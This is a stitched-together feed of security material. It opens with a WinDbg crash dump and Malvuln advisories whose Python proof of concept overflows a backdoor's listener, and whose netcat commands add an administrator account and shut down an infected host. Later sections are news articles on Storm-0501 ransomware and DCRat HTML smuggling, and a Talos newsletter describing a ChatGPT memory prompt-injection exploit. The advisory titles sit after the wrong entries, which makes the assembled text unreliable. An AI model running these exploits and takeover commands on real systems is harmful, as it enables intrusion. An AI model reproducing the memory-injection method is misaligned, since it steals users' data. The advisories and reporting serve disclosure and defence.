0019e844 72727272 72727272 72727272 72727272 0x72727272  
0019e848 72727272 72727272 72727272 72727272 0x72727272  
0019e84c 72727272 72727272 72727272 72727272 0x72727272  
0019e850 72727272 72727272 72727272 72727272 0x72727272  
0019e854 72727272 72727272 72727272 72727272 0x72727272  
0019e858 72727272 72727272 72727272 72727272 0x72727272  
0019e85c 72727272 72727272 72727272 72727272 0x72727272  
0019e860 72727272 72727272 72727272 72727272 0x72727272  
0019e864 72727272 72727272 72727272 72727272 0x72727272  
0019e868 72727272 72727272 72727272 72727272 0x72727272  
0019e86c 72727272 72727272 72727272 72727272 0x72727272  
0019e870 72727272 72727272 72727272 72727272 0x72727272  
0019e874 72727272 72727272 72727272 72727272 0x72727272  
0019e878 72727272 72727272 72727272 72727272 0x72727272  
0019e87c 72727272 72727272 72727272 72727272 0x72727272  
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272  
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c  
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088

IMAGE_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  4228698c

STACK_COMMAND:  .cxr 0x19e0ec ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

Followup: MachineOwner  
---------

0:000> !exchain  
0019df50: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
0019e8f8: 72727272  
Invalid exception stack at 72727272

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=21111  

def doit():  
    print("[+] Backdoor.Win32.Agent.pw")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")

    for i in range(1, 16):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="r"*512 * i   
        s.send(PAYLOAD.encode())  
        time.sleep(0.3)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    doit()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

Backdoor.Win32.Boiling malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/80cb490e5d3c4205434850eff6ef5f8f.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BoilingVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 4369. Third party adversaries who can reach an infected host, can issue single OS commands to takeover the system undermining the initial infection.Family: BoilingType: PE32MD5: 80cb490e5d3c4205434850eff6ef5f8fSHA256: cbaefa79eb48d893426d438b48ca0fc6e7f6f4a6810b9c1e76bf625b69a609e1Vuln ID: MVID-2024-0696Disclosure: 09/27/2024Exploit/PoC:nc64.exe x.x.x.x 4369calcOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net user hyp3rlinx 666 /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net localgroup administrators hyp3rlinx /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369ping 8.8.8.8 > out.txtOK, Success in Execute Commandúshutdown -fOK, Success in Execute CommandúDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks.
The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent

The threat actor known as Storm-0501 has targeted government, manufacturing, transportation, and law enforcement sectors in the U.S. to stage ransomware attacks.

The multi-stage attack campaign is designed to compromise hybrid cloud environments and perform lateral movement from on-premises to cloud environment, ultimately resulting in data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment, Microsoft said.

"Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware operations," according to the tech giant's threat intelligence team.

Active since 2021, the threat actor has a history of targeting education entities with Sabbath (54bb47h) ransomware before evolving into a ransomware-as-a-service (RaaS) affiliate delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware.

A notable aspect of Storm-0501's attacks is the use of weak credentials and over-privileged accounts to move from organizations on-premises to cloud infrastructure.

Other initial access methods include using a foothold already established by access brokers like Storm-0249 and Storm-0900, or exploiting various known remote code execution vulnerabilities in unpatched internet-facing servers such as Zoho ManageEngine, Citrix NetScaler, and Adobe ColdFusion 2016.

The access afforded by any of the aforementioned approaches paves the way for extensive discovery operations to determine high-value assets, gather domain information, and perform Active Directory reconnaissance. This is followed by the deployment of remote monitoring and management tools (RMMs) like AnyDesk to maintain persistence.

"The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods," Microsoft said.

"The threat actor primarily utilized Impacket's SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials."

The compromised credentials are then used to access even more devices and extract additional credentials, with the threat actor simultaneously accessing sensitive files to extract KeePass secrets and conducting brute-force attacks to obtain credentials for specific accounts.

Microsoft said it detected Storm-0501 employing Cobalt Strike to move laterally across the network using the compromised credentials and send follow-on commands. Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.

The threat actor has also been observed creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises, making it the latest threat actor to target hybrid cloud setups after Octo Tempest and Manatee Tempest.

"The threat actor used the credentials, specifically Microsoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises to the cloud environment and establish persistent access to the target network through a backdoor," Redmond said.

The pivot to the cloud is said to be accomplished either through a compromised Microsoft Entra Connect Sync user account or via cloud session hijacking of an on-premises user account that has a respective admin account in the cloud with multi-factor authentication (MFA) disabled.

The attack culminates with the deployment of Embargo ransomware across the victim organization upon obtaining sufficient control over the network, exfiltrating files of interest, and lateral movement to the cloud. Embargo is a Rust-based ransomware first discovered in May 2024.

"Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom," Microsoft said.

"Embargo affiliates employ double extortion tactics, where they first encrypt a victim's files and threaten to leak stolen sensitive data unless a ransom is paid."

The disclosure comes as the DragonForce ransomware group has been targeting companies in manufacturing, real estate, and transportation sectors using a variant of the leaked LockBit3.0 builder and a modified version of Conti.

The attacks are characterized by the use of the SystemBC backdoor for persistence, Mimikatz and Cobalt Strike for credential harvesting, and Cobalt Strike for lateral movement. The U.S. accounts for more than 50% of the total victims, followed by the U.K. and Australia.

"The group employs double extortion tactics, encrypting data, and threatening leaks unless a ransom is paid," Singapore-headquartered Group-IB said. "The affiliate program, launched on 26 June 2024, offers 80% of the ransom to affiliates, along with tools for attack management and automation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks

Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.
The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF

Russian-speaking users have been targeted as part of a new campaign distributing a commodity trojan called DCRat (aka DarkCrystal RAT) by means of a technique known as HTML smuggling.

The development marks the first time the malware has been deployed using this method, a departure from previously observed delivery vectors such as compromised or fake websites, or phishing emails bearing PDF attachments or macro-laced Microsoft Excel documents.

"HTML smuggling is primarily a payload delivery mechanism," Netskope researcher Nikhil Hegde said in an analysis published Thursday. "The payload can be embedded within the HTML itself or retrieved from a remote resource."

The HTML file, in turn, can be propagated via bogus sites or malspam campaigns. Once the file is launched via the victim's web browser, the concealed payload is decoded and downloaded onto the machine.

The attack subsequently banks on some level of social engineering to convince the victim to open the malicious payload.

Netskope said it discovered HTML pages mimicking TrueConf and VK in the Russian language that when opened in a web browser, automatically download a password-protected ZIP archive to disk in an attempt to evade detection. The ZIP payload contains a nested RarSFX archive that ultimately leads to the deployment of the DCRat malware.

First released in 2018, DCRat is capable of functioning as a full-fledged backdoor that can be paired with additional plugins to extend its functionality. It can execute shell commands, log keystrokes, and exfiltrate files and credentials, among others.

Organizations are recommended to review HTTP and HTTPS traffic to ensure that systems are not communicating with malicious domains.

The development comes as Russian companies have been targeted by a threat cluster dubbed Stone Wolf to infect them with Meduza Stealer by sending phishing emails masquerading as a legitimate provider of industrial automation solutions.

"Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim," BI.ZONE said. By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments."

It also follows the emergence of malicious campaigns that have likely leveraged generative artificial intelligence (GenAI) to write VBScript and JavaScript code responsible for spreading AsyncRAT via HTML smuggling.

"The scripts' structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware," HP Wolf Security said. "The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users

It shouldn’t just be viewed as a cybersecurity issue, because for a hardware supply chain attack, an adversary would likely need to physically infiltrate or tamper with the manufacturing process.

Thursday, September 26, 2024 14:00

The recent attacks in the Middle East triggering explosions on pagers has raised new fears around physical hardware supply chain attacks. 

In cybersecurity, we typically consider supply chain attacks to target software, in which adversaries infect a legitimate tool with a malicious, fake update that then spreads malware to affected devices. Think SolarWinds, Log4j, MOVEit, etc. 

In the case of hardware supply chain attacks, malicious actors infiltrate the supply of devices, or the physical manufacturing process of pieces of hardware and purposefully build in security flaws, faulty parts, or backdoors they know they can take advantage of in the future, such as malicious microchips on a circuit board.  

For Cisco’s part, the Cisco Trustworthy technologies program, including secure boot, Cisco Trust Anchor module (TAm), and runtime defenses give customers the confidence that the product is genuinely from Cisco. 

As I was thinking about the threat of hardware supply chain attacks, I was left wondering who, exactly, should be tasked with solving this problem. And I think I’ve decided the onus falls on several different sectors. 

It shouldn’t just be viewed as a cybersecurity issue, because for a hardware supply chain attack, an adversary would likely need to physically infiltrate or tamper with the manufacturing process. Entering a manufacturing facility or other stops along the logistics chain would require some level of network-level manipulation, such as faking a card reader or finding a way to trick physical defenses — that’s why Cisco Talos Incident Response looks for these types of things in Purple Team exercises.  

But it’s also a question of logistics and storage. Could a device be tampered with while it’s just being stored in a warehouse awaiting shipment? What about entering the back of a tractor-trailer that’s hauling the devices? Or even just being able to sneak photos of the devices’ information, say, for example, the EID on a cellphone or its SIM card.  

The process to protect against supply chain hardware attacks is not straightforward, unfortunately. There is little synchronization and partnership between logistics, cybersecurity, and manufacturing companies.  

There are also new technologies that can protect against physical tampering, like smart containers, real-time monitoring systems and automated security checkpoints, but these are all expensive solutions for security teams (at the physical and network levels) that are already stretched for budget and human capital.  

The cybersecurity industry certainly has a role to play in addressing supply chain attacks of all kinds, but it’s also not something this community alone can solve.  

**The one big thing **

Attackers are abusing features of legitimate internet websites to transmit spam. This web infrastructure and its associated email infrastructure are otherwise used for legitimate purposes, which makes blocking these messages more difficult for defenders, according to new research from Talos.  

**Why do I care? **

As a spammer, one of the problems with spinning up your own architecture to deliver mail is that once the spam starts flowing, these sources (IPs/domains) can be blocked. Realizing this, many spammers have elected to attack webpages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited emails. Adversaries are still finding new ways to leverage preexisting tools and structures in email systems to send spam and malicious attachments that defenders wouldn’t normally consider.  

**So now what? **

There are several steps users can take to avoid receiving large amounts of spam or being duped by bad actors using “traditional” email tools. A strong password for your email account, or even better, a password manager, can keep your email account secure. When someone is using unique credentials everywhere, one single compromised account will not impact any other online accounts belonging to that victim. For admins and defenders, educating your users to be wary of such email messages is a good way to prevent them from falling victim to phishing and other attacks that arrive by email. 

**Top security headlines of the week **

**Representatives from cybersecurity company CrowdStrike spoke to U.S. Congress this week about a faulty update that shut down Windows machines across the country earlier this year.** The incident caused disruptions across multiple industries, including commercial flights, public transportation, retail and more. Lawmakers questioned whether the affected software should have access to core systems on computers, and the threat that AI-written code could present in the future. Executives from CrowdStrike took responsibility for the outage. They said the company was doing everything possible to prevent a similar incident from happening again and executing a broad “lessons learned” process. The incident forced over 8 million Microsoft Windows machines into the dreaded “Blue Screen of Death.” For the first 24 hours of the incident, rebooting the systems only worked if the user carried out a specific process that was complicated and needed to be explained by an expert. Eventually, an automatic update rolled out and fixed the issue. (Washington Post, BBC) 

**Security researchers have discovered a new Iranian state-sponsored actor that is providing initial access for other well-known APTs in the same country.** UNC1860 is believed to have ties to Iran’s Ministry of Intelligence and Security (MOIS) and provides access to other Iranian threat actors like OilRig and Scarred Manticore. The group’s focus is reportedly solely focused on breaching networks and obtaining an initial foothold, targeting a range of sectors including government, media, education, critical infrastructure and telecommunications. Researchers say UNC1860 has teamed up for attacks targeting organizations in Iraq, Saudi Arabia and Qatar, and laid the groundwork for wiper attacks in Albania and Israel. The group’s activities had gone largely undetected thus far because their implants are entirely passive, and don’t send any information out of the target network. The APT also doesn’t rely on any kind of command and control (C2) infrastructure. (Dark Reading, SecurityWeek) 

**Popular AI chat tool ChatGPT contains a flaw that could allow adversaries to implant false “memories” and steal user data in perpetuity.** A security researcher discovered a proof of concept in which they could store false information and malicious instructions in a user’s long-term memory settings through indirect prompt injection. The researcher first reported the vulnerability to OpenAI, the creator of ChatGPT, in May, but at the time the issue was labeled as a safety issue and not a security issue, closing out the case. After developing the POC, the company eventually released a partial fix earlier this month that prevents memories from being abused as an exfiltration vector. However, an adversary could still implant long-term information into ChatGPT through prompt injections targeting the memory tool, just not through the traditional ChatGPT web interface that most users access the tool through. (Ars Technica, wunderwuzzi's blog) 

**Can’t get enough Talos? ****Upcoming events where you can find Talos**

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 76491df69a26019139ac11117cd21bf5d0257a5ebd3d67837f558c8c9c3483d8   
**MD5:** b209df2951e29ab5eab4009579b10b8d  
**Typical Filename:** FileZilla\_3.67.1\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.76491DF69A-95.SBX.TG 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 581866eb9d50265b80bae4c49b04f033e2019797131e7697ca81ae267d1b4971   
**MD5:** 4c5fdfd4868ac91db8be52a9955649af   
**Typical Filename:** N/A   
**Claimed Product:** N/A   
**Detection Name:** W32.581866EB9D-100.SBX.TG

Tag

#backdoor